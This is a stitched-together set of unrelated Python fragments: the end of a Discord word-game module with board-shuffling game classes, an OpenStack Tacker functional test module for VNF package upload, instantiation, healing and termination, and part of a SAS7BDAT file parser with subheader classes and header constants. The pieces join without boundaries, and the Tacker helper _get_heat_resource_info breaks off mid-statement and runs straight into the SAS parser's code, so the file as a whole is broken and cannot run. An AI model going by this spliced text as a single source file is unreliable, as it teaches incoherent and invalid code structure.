await asyncio.sleep(10)
self.filter_lists()
await self.message.reply(embed=self.scores)
class FlipGame(ShuffflingGame, DiscordGame):
name = "<NAME>"
footer = "Find words as fast as you can, rows will flip positions every 30 seconds."
def shuffle(self):
rows = [[self.board.columns[x][y] for x in range(self.board.size)] for y in range(self.board.size)]
random.shuffle(rows)
self.board = Board(
size=self.board.size,
board=[[rows[x][y] for x in range(self.board.size)] for y in range(self.board.size)],
)
class BoggleGame(ShuffflingGame, DiscordGame):
name = "<NAME>"
footer = "Find words as fast as you can, letters will shuffle positions every 30 seconds."
def shuffle(self):
letters = [self.board.columns[y][x] for x in range(self.board.size) for y in range(self.board.size)]
random.shuffle(letters)
self.board = Board(
size=self.board.size,
board=[
letters[x * self.board.size : x * self.board.size + self.board.size]
for x in range(self.board.size)
],
)
# Copyright (C) 2020 NTT DATA
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import random
import time
from oslo_serialization import jsonutils
from oslo_utils import uuidutils
from tacker.objects import fields
from tacker.tests.functional import base
from tacker.tests import utils
from tacker.vnfm.infra_drivers.openstack import constants as infra_cnst
VNF_PACKAGE_UPLOAD_TIMEOUT = 300
VNF_INSTANTIATE_TIMEOUT = 600
VNF_TERMINATE_TIMEOUT = 600
VNF_HEAL_TIMEOUT = 600
VNF_CHANGE_EXT_CONN_TIMEOUT = 600
RETRY_WAIT_TIME = 5
def get_ext_managed_virtual_link(id, vl_desc_id, resource_id):
return [{"id": id, "vnfVirtualLinkDescId": vl_desc_id,
"resourceId": resource_id}]
def generate_mac_address():
"""Generate an Ethernet MAC address."""
mac = [0xfa, 0x16, 0x3e,
random.randint(0x00, 0xff),
random.randint(0x00, 0xff),
random.randint(0x00, 0xff)]
return ':'.join(map(lambda x: "%02x" % x, mac))
def generate_ip_addresses(
type_='IPV4',
fixed_addresses=None,
subnet_id=None):
if fixed_addresses:
ip_addr = {
'type': type_,
'fixedAddresses': fixed_addresses
}
if subnet_id:
ip_addr.update({'subnetId': subnet_id})
return [ip_addr]
def get_ext_cp_with_external_link_port(nw_resource_id, port_uuid):
ext_cp = {
"id": "external_network",
"resourceId": nw_resource_id,
"extCps": [{
"cpdId": "CP2",
"cpConfig": [{
"linkPortId": "413f4e46-21cf-41b1-be0f-de8d23f76cfe",
"cpProtocolData": [{
"layerProtocol": "IP_OVER_ETHERNET"
}]
}]
}],
"extLinkPorts": [{
"id": "413f4e46-21cf-41b1-be0f-de8d23f76cfe",
"resourceHandle": {
"resourceId": port_uuid,
"vimLevelResourceType": "LINKPORT"
}
}]
}
return ext_cp
def get_ext_cp_with_fixed_address(nw_resource_id, fixed_addresses, subnet_id):
ext_cp = {
"id": "external_network",
"resourceId": nw_resource_id,
"extCps": [{
"cpdId": "CP2",
"cpConfig": [{
"cpProtocolData": [{
"layerProtocol": "IP_OVER_ETHERNET",
"ipOverEthernet": {
"ipAddresses": generate_ip_addresses(
fixed_addresses=fixed_addresses,
subnet_id=subnet_id)
}
}]
}]
}]
}
return ext_cp
def get_external_virtual_links(net_0_resource_id, net_mgmt_resource_id,
port_uuid, fixed_addresses=None, subnet_id=None):
ext_vl = [
{
"id": "net0",
"resourceId": net_0_resource_id,
"extCps": [{
"cpdId": "CP1",
"cpConfig": [{
"cpProtocolData": [{
"layerProtocol": "IP_OVER_ETHERNET",
"ipOverEthernet": {
"macAddress": generate_mac_address()
}
}]
}]
}]
}
]
if fixed_addresses:
ext_cp = get_ext_cp_with_fixed_address(
net_mgmt_resource_id, fixed_addresses, subnet_id)
else:
ext_cp = get_ext_cp_with_external_link_port(
net_mgmt_resource_id, port_uuid)
ext_vl.append(ext_cp)
return ext_vl
def _create_and_upload_vnf_package(tacker_client, csar_package_name,
user_defined_data):
# create vnf package
body = jsonutils.dumps({"userDefinedData": user_defined_data})
resp, vnf_package = tacker_client.do_request(
'/vnfpkgm/v1/vnf_packages', "POST", body=body)
# upload vnf package
csar_package_path = "../../../etc/samples/etsi/nfv/%s" % csar_package_name
file_path = os.path.abspath(os.path.join(os.path.dirname(__file__),
csar_package_path))
# Generating unique vnfd id. This is required when multiple workers
# are running concurrently. The call below creates a new temporary
# CSAR with unique vnfd id.
file_path, uniqueid = utils.create_csar_with_unique_vnfd_id(file_path)
with open(file_path, 'rb') as file_object:
resp, resp_body = tacker_client.do_request(
'/vnfpkgm/v1/vnf_packages/{id}/package_content'.format(
id=vnf_package['id']),
"PUT", body=file_object, content_type='application/zip')
# wait for onboard
timeout = VNF_PACKAGE_UPLOAD_TIMEOUT
start_time = int(time.time())
show_url = os.path.join('/vnfpkgm/v1/vnf_packages', vnf_package['id'])
vnfd_id = None
while True:
resp, body = tacker_client.do_request(show_url, "GET")
if body['onboardingState'] == "ONBOARDED":
vnfd_id = body['vnfdId']
break
if ((int(time.time()) - start_time) > timeout):
raise Exception("Failed to onboard vnf package")
time.sleep(1)
# remove temporarily created CSAR file
os.remove(file_path)
return vnf_package['id'], vnfd_id
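The onboarding wait above, like the `_vnf_instance_wait` and `_stack_update_wait` loops further down, follows one poll-until-done-or-timeout shape. A generic sketch of that pattern (the `wait_for` helper is hypothetical, not part of Tacker's test base; `clock` and `sleep` are injectable purely so the sketch can be exercised without real waiting):

```python
import time

def wait_for(condition, timeout, interval=5, clock=time.time, sleep=time.sleep):
    """Poll `condition` until it is truthy or `timeout` seconds pass.

    Returns True on success and False on timeout. `clock` and `sleep`
    default to the real wall clock but can be stubbed out in tests.
    """
    start = clock()
    while True:
        if condition():
            return True
        if clock() - start > timeout:
            return False
        sleep(interval)
```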
class VnfLcmTest(base.BaseTackerTest):
@classmethod
def setUpClass(cls):
cls.tacker_client = base.BaseTackerTest.tacker_http_client()
cls.vnf_package_1, cls.vnfd_id_1 = _create_and_upload_vnf_package(
cls.tacker_client, "vnflcm1", {"key": "sample_1_functional"})
cls.vnf_package_2, cls.vnfd_id_2 = _create_and_upload_vnf_package(
cls.tacker_client, "vnflcm2", {"key": "sample_2_functional"})
cls.vnf_package_3, cls.vnfd_id_3 = _create_and_upload_vnf_package(
cls.tacker_client, "vnflcm3", {"key": "sample_3_functional"})
super(VnfLcmTest, cls).setUpClass()
@classmethod
def tearDownClass(cls):
# Update vnf package operational state to DISABLED
update_req_body = jsonutils.dumps({
"operationalState": "DISABLED"})
base_path = "/vnfpkgm/v1/vnf_packages"
for package_id in [cls.vnf_package_1, cls.vnf_package_2,
cls.vnf_package_3]:
resp, resp_body = cls.tacker_client.do_request(
'{base_path}/{id}'.format(id=package_id,
base_path=base_path),
"PATCH", content_type='application/json', body=update_req_body)
# Delete vnf package
url = '/vnfpkgm/v1/vnf_packages/%s' % package_id
cls.tacker_client.do_request(url, "DELETE")
super(VnfLcmTest, cls).tearDownClass()
def setUp(self):
super(VnfLcmTest, self).setUp()
self.base_url = "/vnflcm/v1/vnf_instances"
self.base_vnf_lcm_op_occs_url = "/vnflcm/v1/vnf_lcm_op_occs"
vim_list = self.client.list_vims()
if not vim_list:
self.skipTest("Vims are not configured")
vim_id = 'VIM0'
vim = self.get_vim(vim_list, vim_id)
if not vim:
self.skipTest("Default VIM '%s' is missing" % vim_id)
self.vim_id = vim['id']
def _instantiate_vnf_request(self, flavour_id,
instantiation_level_id=None, vim_id=None, ext_vl=None,
ext_managed_vl=None):
request_body = {"flavourId": flavour_id}
if instantiation_level_id:
request_body["instantiationLevelId"] = instantiation_level_id
if ext_managed_vl:
request_body["extManagedVirtualLinks"] = ext_managed_vl
if ext_vl:
request_body["extVirtualLinks"] = ext_vl
if vim_id:
request_body["vimConnectionInfo"] = [
{"id": uuidutils.generate_uuid(),
"vimId": vim_id,
"vimType": "ETSINFV.OPENSTACK_KEYSTONE.v_2"}]
return request_body
def _create_vnf_instance(self, vnfd_id, vnf_instance_name=None,
vnf_instance_description=None):
request_body = {'vnfdId': vnfd_id}
if vnf_instance_name:
request_body['vnfInstanceName'] = vnf_instance_name
if vnf_instance_description:
request_body['vnfInstanceDescription'] = vnf_instance_description
resp, response_body = self.http_client.do_request(
self.base_url, "POST", body=jsonutils.dumps(request_body))
return resp, response_body
def _delete_wait_vnf_instance(self, id):
timeout = VNF_TERMINATE_TIMEOUT
url = os.path.join(self.base_url, id)
start_time = int(time.time())
while True:
resp, body = self.http_client.do_request(url, "DELETE")
if 204 == resp.status_code:
break
if ((int(time.time()) - start_time) > timeout):
error = "Failed to delete vnf instance %s"
self.fail(error % id)
time.sleep(RETRY_WAIT_TIME)
def _delete_vnf_instance(self, id):
self._delete_wait_vnf_instance(id)
# verify vnf instance is deleted
url = os.path.join(self.base_url, id)
resp, body = self.http_client.do_request(url, "GET")
self.assertEqual(404, resp.status_code)
def _show_vnf_instance(self, id, expected_result=None):
show_url = os.path.join(self.base_url, id)
resp, vnf_instance = self.http_client.do_request(show_url, "GET")
self.assertEqual(200, resp.status_code)
if expected_result:
self.assertDictSupersetOf(expected_result, vnf_instance)
return vnf_instance
def _list_vnf_instances(self):
resp, vnf_instances = self.http_client.do_request(self.base_url, "GET")
self.assertEqual(200, resp.status_code)
return vnf_instances
def _stack_update_wait(self, stack_id, expected_status,
timeout=VNF_HEAL_TIMEOUT):
start_time = int(time.time())
while True:
stack = self.h_client.stacks.get(stack_id)
if stack.stack_status == expected_status:
break
if ((int(time.time()) - start_time) > timeout):
error = ("Stack %(id)s status is %(current)s, expected status "
"should be %(expected)s")
self.fail(error % {"id": stack_id, "current": stack.status,
"expected": expected_status})
time.sleep(RETRY_WAIT_TIME)
def _vnf_instance_wait(self, id,
instantiation_state=fields.VnfInstanceState.INSTANTIATED,
timeout=VNF_INSTANTIATE_TIMEOUT):
show_url = os.path.join(self.base_url, id)
start_time = int(time.time())
while True:
resp, body = self.http_client.do_request(show_url, "GET")
if body['instantiationState'] == instantiation_state:
break
if ((int(time.time()) - start_time) > timeout):
error = ("Vnf instance %(id)s status is %(current)s, "
"expected status should be %(expected)s")
self.fail(error % {"id": id,
"current": body['instantiationState'],
"expected": instantiation_state})
time.sleep(RETRY_WAIT_TIME)
def _create_network(self, neutron_client, network_name):
net = neutron_client.create_network(
{'network': {'name': "network-%s" % uuidutils.generate_uuid()}})
net_id = net['network']['id']
self.addCleanup(neutron_client.delete_network, net_id)
return net_id
def _create_subnet(self, neutron_client, network_id):
body = {'subnet': {'network_id': network_id,
'name': "subnet-%s" % uuidutils.generate_uuid(),
'cidr': "172.16.58.3/24",
'ip_version': 4,
'gateway_ip': '172.16.31.10',
"enable_dhcp": True}}
subnet = neutron_client.create_subnet(body=body)["subnet"]
self.addCleanup(neutron_client.delete_subnet, subnet['id'])
return subnet['id']
def _create_port(self, neutron_client, network_id):
body = {'port': {'network_id': network_id}}
port = neutron_client.create_port(body=body)["port"]
self.addCleanup(neutron_client.delete_port, port['id'])
return port['id']
def _instantiate_vnf_instance(self, id, request_body):
url = os.path.join(self.base_url, id, "instantiate")
resp, body = self.http_client.do_request(url, "POST",
body=jsonutils.dumps(request_body))
self.assertEqual(202, resp.status_code)
self._vnf_instance_wait(id)
def _terminate_vnf_instance(self, id, request_body):
url = os.path.join(self.base_url, id, "terminate")
resp, body = self.http_client.do_request(url, "POST",
body=jsonutils.dumps(request_body))
self.assertEqual(202, resp.status_code)
timeout = request_body.get('gracefulTerminationTimeout')
start_time = int(time.time())
self._vnf_instance_wait(id,
instantiation_state=fields.VnfInstanceState.NOT_INSTANTIATED,
timeout=VNF_TERMINATE_TIMEOUT)
# If gracefulTerminationTimeout is set, check whether vnf
# instantiation_state is set to NOT_INSTANTIATED after
# gracefulTerminationTimeout seconds.
if timeout and int(time.time()) - start_time < timeout:
self.fail("Vnf is terminated before graceful termination "
"timeout period")
def _heal_vnf_instance(self, vnf_instance, request_body,
expected_stack_status=infra_cnst.STACK_UPDATE_COMPLETE):
url = os.path.join(self.base_url, vnf_instance['id'], "heal")
resp, body = self.http_client.do_request(url, "POST",
body=jsonutils.dumps(request_body))
self.assertEqual(202, resp.status_code)
stack = self.h_client.stacks.get(vnf_instance['vnfInstanceName'])
# Wait until tacker heals the stack resources as requested
# in the heal request
self._stack_update_wait(stack.id, expected_stack_status)
def _heal_sol_003_vnf_instance(self, vnf_instance, request_body):
url = os.path.join(self.base_url, vnf_instance['id'], "heal")
resp, body = self.http_client.do_request(url, "POST",
body=jsonutils.dumps(request_body))
self.assertEqual(202, resp.status_code)
# If healing is done without vnfc components, it will delete the
# stack and create a new one. So wait until vnf is deleted and then
# wait until a new stack is created using vnfInstanceName and once
# the stack is created, wait until its status becomes
# CREATE_COMPLETE.
stack = self.h_client.stacks.get(vnf_instance['vnfInstanceName'])
self._stack_update_wait(stack.id, infra_cnst.STACK_DELETE_COMPLETE)
start_time = int(time.time())
timeout = VNF_INSTANTIATE_TIMEOUT
while True:
try:
stack = self.h_client.stacks.get(
vnf_instance['vnfInstanceName'])
if stack.stack_status == infra_cnst.STACK_CREATE_COMPLETE:
break
except Exception:
pass
if ((int(time.time()) - start_time) > timeout):
self.fail("Failed to heal vnf during instantiation")
time.sleep(RETRY_WAIT_TIME)
def _get_server(self, server_id):
try:
self.novaclient().servers.get(server_id)
except Exception:
self.fail("Failed to get vdu resource %s id" % server_id)
def _verify_vnfc_resource_info(self, vnf_instance_old,
vnf_instance_current, vdu_count):
vnfc_resource_info_old = (vnf_instance_old['instantiatedVnfInfo']
['vnfcResourceInfo'])
vnfc_resource_info_current = (vnf_instance_current
['instantiatedVnfInfo']['vnfcResourceInfo'])
for index in range(vdu_count):
# compare computeResource resourceId is different
vdu_resource_id_old = (vnfc_resource_info_old[index]
['computeResource']['resourceId'])
vdu_resource_id_current = (vnfc_resource_info_current[index]
['computeResource']['resourceId'])
self.assertNotEqual(vdu_resource_id_old, vdu_resource_id_current)
# Now check whether vdus are healed properly and servers exists
# in nova.
self._get_server(vdu_resource_id_current)
def _change_ext_conn_vnf_request(self, vim_id=None, ext_vl=None):
request_body = {}
if ext_vl:
request_body["extVirtualLinks"] = ext_vl
if vim_id:
request_body["vimConnectionInfo"] = [
{"id": uuidutils.generate_uuid(),
"vimId": vim_id,
"vimType": "ETSINFV.OPENSTACK_KEYSTONE.v_2"}]
return request_body
def _change_ext_conn_vnf_instance(self, vnf_instance, request_body,
expected_stack_status=infra_cnst.STACK_UPDATE_COMPLETE):
url = os.path.join(self.base_url, vnf_instance['id'],
"change_ext_conn")
resp, body = self.http_client.do_request(url, "POST",
body=jsonutils.dumps(request_body))
self.assertEqual(202, resp.status_code)
stack = self.h_client.stacks.get(vnf_instance['vnfInstanceName'])
# Wait until tacker changes the stack resources as requested
# in the change_ext_conn request
self._stack_update_wait(stack.id, expected_stack_status,
VNF_CHANGE_EXT_CONN_TIMEOUT)
def _get_heat_stack(self, vnf_instance_id, stack_name):
heatclient = self.heatclient()
try:
stacks = heatclient.stacks.list()
except Exception:
return None
target_stacks = list(
filter(
lambda x: x.stack_name == stack_name,
stacks))
if len(target_stacks) == 0:
return None
return target_stacks[0]
def _get_heat_resource_info(self, stack_id, nested_depth=0,
resource_name=None):
heatclient = self.heatclient()
try:
if resource_name is None:
resources = heatclient.resources.list(stack_id,
nested_depth=nested_depth)
else:
resources = heatclient.resources.get(
stack_id, resource_name)
self.properties.lcs = self.parent._read_val('h', vals[lcs], 2)
self.properties.lcp = self.parent._read_val('h', vals[lcp], 2)
class ColumnSizeSubheader(ProcessingSubheader):
def process_subheader(self, offset, length):
offset += self.int_length
vals = self.parent._read_bytes({
offset: self.int_length
})
if self.properties.column_count is not None:
self.logger.error('found more than one column count subheader')
self.properties.column_count = self.parent._read_val(
'i', vals[offset], self.int_length
)
if self.properties.col_count_p1 + self.properties.col_count_p2 !=\
self.properties.column_count:
self.logger.warning('column count mismatch')
class SubheaderCountsSubheader(ProcessingSubheader):
def process_subheader(self, offset, length):
pass # Not sure what to do here yet
class ColumnTextSubheader(ProcessingSubheader):
def process_subheader(self, offset, length):
offset += self.int_length
vals = self.parent._read_bytes({
offset: self.TEXT_BLOCK_SIZE_LENGTH
})
text_block_size = self.parent._read_val(
'h', vals[offset], self.TEXT_BLOCK_SIZE_LENGTH
)
vals = self.parent._read_bytes({
offset: text_block_size
})
self.parent.column_names_strings.append(vals[offset])
if len(self.parent.column_names_strings) == 1:
column_name = self.parent.column_names_strings[0]
compression_literal = None
for cl in SAS7BDAT.COMPRESSION_LITERALS:
if cl in column_name:
compression_literal = cl
break
self.properties.compression = compression_literal
offset -= self.int_length
vals = self.parent._read_bytes({
offset + (20 if self.properties.u64 else 16): 8
})
compression_literal = self.parent._read_val(
's',
vals[offset + (20 if self.properties.u64 else 16)],
8
).strip()
if len(compression_literal) == 0:
self.properties.lcs = 0
vals = self.parent._read_bytes({
offset + 16 + (20 if self.properties.u64 else 16):
self.properties.lcp
})
creatorproc = self.parent._read_val(
's',
vals[offset + 16 + (20 if self.properties.u64 else 16)],
self.properties.lcp
)
self.properties.creator_proc = creatorproc
elif compression_literal == SAS7BDAT.RLE_COMPRESSION:
vals = self.parent._read_bytes({
offset + 24 + (20 if self.properties.u64 else 16):
self.properties.lcp
})
creatorproc = self.parent._read_val(
's',
vals[offset + 24 + (20 if self.properties.u64 else 16)],
self.properties.lcp
)
self.properties.creator_proc = creatorproc
elif self.properties.lcs > 0:
self.properties.lcp = 0
vals = self.parent._read_bytes({
offset + (20 if self.properties.u64 else 16):
self.properties.lcs
})
creator = self.parent._read_val(
's',
vals[offset + (20 if self.properties.u64 else 16)],
self.properties.lcs
)
self.properties.creator = creator
class ColumnNameSubheader(ProcessingSubheader):
def process_subheader(self, offset, length):
offset += self.int_length
column_name_pointers_count = (length - 2 * self.int_length - 12) // 8
for i in xrange(column_name_pointers_count):
text_subheader = (
offset + self.COLUMN_NAME_POINTER_LENGTH * (i + 1) +
self.COLUMN_NAME_TEXT_SUBHEADER_OFFSET
)
col_name_offset = (
offset + self.COLUMN_NAME_POINTER_LENGTH * (i + 1) +
self.COLUMN_NAME_OFFSET_OFFSET
)
col_name_length = (
offset + self.COLUMN_NAME_POINTER_LENGTH * (i + 1) +
self.COLUMN_NAME_LENGTH_OFFSET
)
vals = self.parent._read_bytes({
text_subheader: self.COLUMN_NAME_TEXT_SUBHEADER_LENGTH,
col_name_offset: self.COLUMN_NAME_OFFSET_LENGTH,
col_name_length: self.COLUMN_NAME_LENGTH_LENGTH,
})
idx = self.parent._read_val(
'h', vals[text_subheader],
self.COLUMN_NAME_TEXT_SUBHEADER_LENGTH
)
col_offset = self.parent._read_val(
'h', vals[col_name_offset],
self.COLUMN_NAME_OFFSET_LENGTH
)
col_len = self.parent._read_val(
'h', vals[col_name_length],
self.COLUMN_NAME_LENGTH_LENGTH
)
name_str = self.parent.column_names_strings[idx]
self.parent.column_names.append(
name_str[col_offset:col_offset + col_len]
)
if i == 0:
self.properties.label = name_str[36+8*(self.properties.compression is not None):col_offset]
class ColumnAttributesSubheader(ProcessingSubheader):
def process_subheader(self, offset, length):
int_len = self.int_length
column_attributes_vectors_count = (
(length - 2 * int_len - 12) // (int_len + 8)
)
for i in xrange(column_attributes_vectors_count):
col_data_offset = (
offset + int_len + self.COLUMN_DATA_OFFSET_OFFSET + i *
(int_len + 8)
)
col_data_len = (
offset + 2 * int_len + self.COLUMN_DATA_LENGTH_OFFSET + i *
(int_len + 8)
)
col_types = (
offset + 2 * int_len + self.COLUMN_TYPE_OFFSET + i *
(int_len + 8)
)
vals = self.parent._read_bytes({
col_data_offset: int_len,
col_data_len: self.COLUMN_DATA_LENGTH_LENGTH,
col_types: self.COLUMN_TYPE_LENGTH,
})
self.parent.column_data_offsets.append(self.parent._read_val(
'i', vals[col_data_offset], int_len
))
self.parent.column_data_lengths.append(self.parent._read_val(
'i', vals[col_data_len], self.COLUMN_DATA_LENGTH_LENGTH
))
ctype = self.parent._read_val(
'b', vals[col_types], self.COLUMN_TYPE_LENGTH
)
self.parent.column_types.append(
'number' if ctype == 1 else 'string'
)
class FormatAndLabelSubheader(ProcessingSubheader):
def process_subheader(self, offset, length):
int_len = self.int_length
text_subheader_format = (
offset + self.COLUMN_FORMAT_TEXT_SUBHEADER_INDEX_OFFSET + 3 *
int_len
)
col_format_offset = (
offset + self.COLUMN_FORMAT_OFFSET_OFFSET + 3 * int_len
)
col_format_len = (
offset + self.COLUMN_FORMAT_LENGTH_OFFSET + 3 * int_len
)
text_subheader_label = (
offset + self.COLUMN_LABEL_TEXT_SUBHEADER_INDEX_OFFSET + 3 *
int_len
)
col_label_offset = (
offset + self.COLUMN_LABEL_OFFSET_OFFSET + 3 * int_len
)
col_label_len = (
offset + self.COLUMN_LABEL_LENGTH_OFFSET + 3 * int_len
)
vals = self.parent._read_bytes({
text_subheader_format:
self.COLUMN_FORMAT_TEXT_SUBHEADER_INDEX_LENGTH,
col_format_offset: self.COLUMN_FORMAT_OFFSET_LENGTH,
col_format_len: self.COLUMN_FORMAT_LENGTH_LENGTH,
text_subheader_label:
self.COLUMN_LABEL_TEXT_SUBHEADER_INDEX_LENGTH,
col_label_offset: self.COLUMN_LABEL_OFFSET_LENGTH,
col_label_len: self.COLUMN_LABEL_LENGTH_LENGTH,
})
# min used to prevent incorrect data which appear in some files
format_idx = min(
self.parent._read_val(
'h', vals[text_subheader_format],
self.COLUMN_FORMAT_TEXT_SUBHEADER_INDEX_LENGTH
),
len(self.parent.column_names_strings) - 1
)
format_start = self.parent._read_val(
'h', vals[col_format_offset],
self.COLUMN_FORMAT_OFFSET_LENGTH
)
format_len = self.parent._read_val(
'h', vals[col_format_len],
self.COLUMN_FORMAT_LENGTH_LENGTH
)
# min used to prevent incorrect data which appear in some files
label_idx = min(
self.parent._read_val(
'h', vals[text_subheader_label],
self.COLUMN_LABEL_TEXT_SUBHEADER_INDEX_LENGTH,
),
len(self.parent.column_names_strings) - 1
)
label_start = self.parent._read_val(
'h', vals[col_label_offset],
self.COLUMN_LABEL_OFFSET_LENGTH
)
label_len = self.parent._read_val(
'h', vals[col_label_len],
self.COLUMN_LABEL_LENGTH_LENGTH
)
label_names = self.parent.column_names_strings[label_idx]
column_label = label_names[label_start:label_start + label_len]
format_names = self.parent.column_names_strings[format_idx]
column_format = format_names[format_start:format_start + format_len]
current_column_number = len(self.parent.columns)
self.parent.columns.append(
Column(current_column_number,
self.parent.column_names[current_column_number],
column_label,
column_format,
self.parent.column_types[current_column_number],
self.parent.column_data_lengths[current_column_number])
)
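A minimal sketch of the slicing performed above: the format-and-label subheader stores only (text-blob index, start, length) triples, while the strings themselves live in the column-text blobs. The blob content and offsets below are made up for illustration.

```python
# Hypothetical column-text blob; real blobs come from ColumnTextSubheader.
names_blob = "BESTDATE9.Sale date"
fmt_start, fmt_len = 4, 6     # assumed format offsets into the blob
lbl_start, lbl_len = 10, 9    # assumed label offsets into the blob

column_format = names_blob[fmt_start:fmt_start + fmt_len]
column_label = names_blob[lbl_start:lbl_start + lbl_len]
assert column_format == 'DATE9.'
assert column_label == 'Sale date'
```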
class ColumnListSubheader(ProcessingSubheader):
def process_subheader(self, offset, length):
pass # Not sure what to do with this yet
class DataSubheader(ProcessingSubheader):
def process_subheader(self, offset, length):
self.parent.current_row = self.parent._process_byte_array_with_data(
offset, length
)
class SASProperties(object):
def __init__(self):
self.u64 = False
self.endianess = None
self.platform = None
self.name = None
self.label = None
self.file_type = None
self.date_created = None
self.date_modified = None
self.header_length = None
self.page_length = None
self.page_count = None
self.sas_release = None
self.server_type = None
self.os_type = None
self.os_name = None
self.compression = None
self.row_length = None
self.row_count = None
self.col_count_p1 = None
self.col_count_p2 = None
self.mix_page_row_count = None
self.lcs = None
self.lcp = None
self.creator = None
self.creator_proc = None
self.column_count = None
self.filename = None
class SASHeader(object):
MAGIC = b'\x00\x00\x00\x00\x00\x00\x00\x00' \
b'\x00\x00\x00\x00\xc2\xea\x81\x60' \
b'\xb3\x14\x11\xcf\xbd\x92\x08\x00' \
b'\x09\xc7\x31\x8c\x18\x1f\x10\x11'
ROW_SIZE_SUBHEADER_INDEX = 'row_size'
COLUMN_SIZE_SUBHEADER_INDEX = 'column_size'
SUBHEADER_COUNTS_SUBHEADER_INDEX = 'subheader_counts'
COLUMN_TEXT_SUBHEADER_INDEX = 'column_text'
COLUMN_NAME_SUBHEADER_INDEX = 'column_name'
COLUMN_ATTRIBUTES_SUBHEADER_INDEX = 'column_attributes'
FORMAT_AND_LABEL_SUBHEADER_INDEX = 'format_and_label'
COLUMN_LIST_SUBHEADER_INDEX = 'column_list'
DATA_SUBHEADER_INDEX = 'data'
# Subheader signatures, 32 and 64 bit, little and big endian
SUBHEADER_SIGNATURE_TO_INDEX = {
b'\xF7\xF7\xF7\xF7': ROW_SIZE_SUBHEADER_INDEX,
b'\x00\x00\x00\x00\xF7\xF7\xF7\xF7': ROW_SIZE_SUBHEADER_INDEX,
b'\xF7\xF7\xF7\xF7\x00\x00\x00\x00': ROW_SIZE_SUBHEADER_INDEX,
b'\xF6\xF6\xF6\xF6': COLUMN_SIZE_SUBHEADER_INDEX,
b'\x00\x00\x00\x00\xF6\xF6\xF6\xF6': COLUMN_SIZE_SUBHEADER_INDEX,
b'\xF6\xF6\xF6\xF6\x00\x00\x00\x00': COLUMN_SIZE_SUBHEADER_INDEX,
b'\x00\xFC\xFF\xFF': SUBHEADER_COUNTS_SUBHEADER_INDEX,
b'\xFF\xFF\xFC\x00': SUBHEADER_COUNTS_SUBHEADER_INDEX,
b'\x00\xFC\xFF\xFF\xFF\xFF\xFF\xFF': SUBHEADER_COUNTS_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFF\xFF\xFF\xFC\x00': SUBHEADER_COUNTS_SUBHEADER_INDEX,
b'\xFD\xFF\xFF\xFF': COLUMN_TEXT_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFD': COLUMN_TEXT_SUBHEADER_INDEX,
b'\xFD\xFF\xFF\xFF\xFF\xFF\xFF\xFF': COLUMN_TEXT_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFD': COLUMN_TEXT_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFF': COLUMN_NAME_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF': COLUMN_NAME_SUBHEADER_INDEX,
b'\xFC\xFF\xFF\xFF': COLUMN_ATTRIBUTES_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFC': COLUMN_ATTRIBUTES_SUBHEADER_INDEX,
b'\xFC\xFF\xFF\xFF\xFF\xFF\xFF\xFF': COLUMN_ATTRIBUTES_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC': COLUMN_ATTRIBUTES_SUBHEADER_INDEX,
b'\xFE\xFB\xFF\xFF': FORMAT_AND_LABEL_SUBHEADER_INDEX,
b'\xFF\xFF\xFB\xFE': FORMAT_AND_LABEL_SUBHEADER_INDEX,
b'\xFE\xFB\xFF\xFF\xFF\xFF\xFF\xFF': FORMAT_AND_LABEL_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFF\xFF\xFF\xFB\xFE': FORMAT_AND_LABEL_SUBHEADER_INDEX,
b'\xFE\xFF\xFF\xFF': COLUMN_LIST_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFE': COLUMN_LIST_SUBHEADER_INDEX,
b'\xFE\xFF\xFF\xFF\xFF\xFF\xFF\xFF': COLUMN_LIST_SUBHEADER_INDEX,
b'\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFE': COLUMN_LIST_SUBHEADER_INDEX,
}
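The dispatch implied by this table can be sketched as follows: the signature length depends on the u64 flag, and the raw bytes at the start of a subheader select its type. The two mapping entries are copied from the table above; the fallback to a data subheader for unmatched signatures is an assumption.

```python
SIGS = {
    b'\xF7\xF7\xF7\xF7': 'row_size',                   # 32-bit signature
    b'\x00\x00\x00\x00\xF7\xF7\xF7\xF7': 'row_size',   # 64-bit signature
}

def classify(raw, u64=False):
    # Signatures are 8 bytes on u64 files, 4 bytes otherwise.
    sig = raw[:8 if u64 else 4]
    return SIGS.get(sig, 'data')

assert classify(b'\xF7\xF7\xF7\xF7' + b'\x00' * 4) == 'row_size'
assert classify(b'\x00\x00\x00\x00\xF7\xF7\xF7\xF7', u64=True) == 'row_size'
```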
SUBHEADER_INDEX_TO_CLASS = {
ROW_SIZE_SUBHEADER_INDEX: RowSizeSubheader,
COLUMN_SIZE_SUBHEADER_INDEX: ColumnSizeSubheader,
SUBHEADER_COUNTS_SUBHEADER_INDEX: SubheaderCountsSubheader,
COLUMN_TEXT_SUBHEADER_INDEX: ColumnTextSubheader,
COLUMN_NAME_SUBHEADER_INDEX: ColumnNameSubheader,
COLUMN_ATTRIBUTES_SUBHEADER_INDEX: ColumnAttributesSubheader,
FORMAT_AND_LABEL_SUBHEADER_INDEX: FormatAndLabelSubheader,
COLUMN_LIST_SUBHEADER_INDEX: ColumnListSubheader,
DATA_SUBHEADER_INDEX: DataSubheader,
}
ALIGN_1_CHECKER_VALUE = b'3'
ALIGN_1_OFFSET = 32
ALIGN_1_LENGTH = 1
ALIGN_1_VALUE = 4
U64_BYTE_CHECKER_VALUE = b'3'
ALIGN_2_OFFSET = 35
ALIGN_2_LENGTH = 1
ALIGN_2_VALUE = 4
ENDIANNESS_OFFSET = 37
ENDIANNESS_LENGTH = 1
PLATFORM_OFFSET = 39
PLATFORM_LENGTH = 1
DATASET_OFFSET = 92
DATASET_LENGTH = 64
